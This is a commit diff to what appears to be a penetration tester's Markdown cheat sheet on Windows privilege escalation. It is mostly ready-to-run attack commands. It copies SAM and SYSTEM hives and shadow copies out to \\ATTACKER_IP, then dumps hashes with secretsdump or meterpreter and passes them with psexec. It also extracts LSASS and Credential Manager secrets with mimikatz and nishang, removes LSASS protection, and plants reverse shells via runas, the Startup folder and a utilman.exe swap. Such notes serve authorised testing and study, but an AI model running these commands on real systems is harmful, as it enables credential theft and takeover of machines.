added priv esc for windows

2022-09-01 23:52:46 +02:00 · 2022-09-01 23:52:46 +02:00 · 9a18fefd36
parent 62756e0aad
commit 9a18fefd36
1 changed files with 105 additions and 15 deletions
--- a/exploitation/priv_esc/docs/windows/windows_priv_esc.md
+++ b/exploitation/priv_esc/docs/windows/windows_priv_esc.md
@ -1,6 +1,7 @@
 # Windows Privilege Escalation
 ## Links
 * [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
 * [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
 * [JAWS](https://github.com/411Hall/JAWS)
@ -17,9 +18,11 @@
 * __System__, local system, final escalation
 * __Local Service__, got anonymous connections over network.
 * __Network Service__, default service account, authentication via network
 ## Enumeration
 ### Users & Groups
 ```sh
 whoami /priv
 net users
@ -35,6 +38,7 @@ qwinsta
 * [powershell](../../../../enumeration/windows/powershell.md)
 ### System
 ```sh
 hostname
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
@ -48,15 +52,42 @@ wmic product get name,version,vendor
 wmic service list brief | findstr  "Running"
 ```
 ### Logfiles and Registry
 ```sh
 cmdkey /list
 ```
 * Keys containing passwords
 ```
 reg query HKLM /f password /t REG_SZ /s
 reg query HKCU /f password /t REG_SZ /s
 ```
 ### AD Credentials
 * Check AD's NTDS, SYSVOL
 * Check user description of AD users
 ```sh
 Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description
 ```
 ## Exploit
 * __Use found credentials__
 ```sh
 runas /savecred /user:<domain\user> reverse_shell.exe
 ```
 ### DLL Hijacking
 * [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)
 ### Unquoted Service Path
 * [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md)
 ### Token Impersonation
 * `SeImpersonatePrivilege` is necessary, check via `whoami priv`
 *  Hot Potato is best before Server 2019 and Windows 10 (version 1809)
 * [Potatos](../../../../exploit/windows/docs/potatoes.md)
@ -71,19 +102,6 @@ wmic service list brief | findstr  "Running"
 * [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)
 ### Search for Credentials
 ```sh
 cmdkey /list
 ```
 * Use found credentials
 ```sh
 runas /savecred /user:<user> reverse_shell.exe
 ```
 * Keys containing passwords
 ```
 reg query HKLM /f password /t REG_SZ /s
 reg query HKCU /f password /t REG_SZ /s
 ```
 ### accesschk64 Permissions
 * Check access to files and folders
@ -98,6 +116,7 @@ accesschk64 -wvu "file.exe"
 * Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.
 #### accesschk64 for Services
 ```sh
 accesschk64 -qlc "service.exe"
 ```
@ -113,9 +132,11 @@ sc start TheService
 ```
 ### Startup Application
 * Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`  
 ### Password Mining
 * Set up metasploit
 ```sh
 use auxiliary/server/capture/http_basic
@ -235,27 +256,39 @@ icacls C:\Path/to/service.exe /grant Everyone:F
 * `whoami /priv`
 #### SeBackup / Restore
 * If `SeBackup / SeRestore` (rw on all files) is set an elevated `cmd.exe` may be opened
 * Download `SAM` and `System` hashes
 ```sh
 reg save hklm\system C:\Windows\Temp\system.hive
 reg save hklm\sam    C:\Windows\Temp\sam.hive
 ```
 * or
 ```sh
 copy C:\Windows\System32\config\sam \\ATTACKER_IP\
 ```
 * Start smb server on attack machine
 ```sh
 copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
 copy C:\Windows\Temp\system.hive \\ATTACKER_IP\
 ```
 * Dump the hashes
 ```sh
 secretsdump.py -sam sam.hive -system system.hive LOCAL
 ```
 * or meterpreter on target
 ```sh
 hashdump
 ```
 * Use pass the hash to login 
 ```sh
 psexec.py -hashes <hash> administrator@$TARGET_IP
 ```
 #### SeTakeOwnership
 * If `SeTakeOwnership` is set one can take ownership of every file or service.
 ```sh
 takeown /f C:\Windows\System32\Utilman.exe
@ -264,9 +297,7 @@ copy cmd.exe utilman.exe
 ```
 * Log out, on the Login screen click on `Ease of Access`
 #### SeImpersonate / SeAssignPrimaryToken
 * It is a rouge potato
 * Execute process as another user
 * Service accounts operate through impersonation
@ -277,3 +308,62 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
 ```
 * Catch the potatoe executable from target via netcat
 ### Volume Shadow Copy Service
 * Take a look at the volumes at
 ```sh
 vssadmin list shadows
 ```
 * Copy `sam` and `system` from the shadow copy
 ```sh
 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
 ```
 ### Dump LSASS
 * If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile`
 * Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe`
 * Extract the dump via mimikatz
 ```sh
 privilege::debug
 sekurlsa::logonpasswords
 ```
 ### LSASS Protection
 * If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `1` under
 ```sh
 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
 ```
 * Alternatively use mimikatz
 ```sh
 !+
 !processprotect /process:lsass.exe /remove
 ```
 ### Windows Credential Manager
 * Can be found via `Control Pane` -> `User Accounts` -> `Credential Manager`
 * Alternatively, command line can be used
 ```sh
 vaultcmd /list
 vaultcmd /listproperties:"Web Credentials"
 vaultcmd /listcreds:"web credentials"
 ```
 * Extract the password via powershell script [Get-WebCredentials from nishang](https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1)
 ```sh
 powershell -ex bypass
 Get-WebCredentials
 ```
 * Via mimikatz if administrative permissions have been gained
 ```sh
 privilege::debug
 sekurlsa::credman
 ```